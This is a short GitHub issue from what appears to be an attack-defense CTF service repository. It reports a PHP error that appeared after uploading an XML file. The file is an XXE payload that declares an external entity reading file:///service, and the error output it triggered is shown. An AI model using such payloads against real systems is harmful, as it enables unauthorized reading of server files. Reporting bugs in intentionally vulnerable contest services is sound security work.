enowars/enowars7-service-oldschool

Read XML file Error

Closed this issue · 0 comments

On Screen Error when Uploading the following file

<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///service">
]>
<note>
  <title>XXE Example</title>
  <description>&xxe;</description>
</note>

Error:
Notice: DOMDocument::loadXML(): read of 8192 bytes failed with errno=21 Is a directory in /service/index.php on line 276